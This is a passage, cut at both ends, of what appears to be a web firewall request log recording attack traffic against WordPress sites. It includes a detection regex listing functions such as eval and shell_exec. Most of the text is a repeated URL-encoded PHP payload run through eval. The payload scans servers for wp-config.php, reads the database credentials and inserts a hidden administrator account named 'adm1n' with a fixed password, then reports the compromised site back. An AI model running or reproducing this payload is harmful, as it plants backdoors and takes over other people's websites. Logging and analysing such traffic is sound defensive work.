4lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/pomo\/mo.php HTTP\/1.1\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.3 Safari\/605.1.15\naccept:*\/*\naccept-encoding:gzip,deflate\ncontent-type:application\/x-www-form-urlencoded\ncontent-length:12663\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\n\nHaFMzo=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
["2026-05-16 06:06:42","213.209.159.254","POST","\/","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/116.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> Gr:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE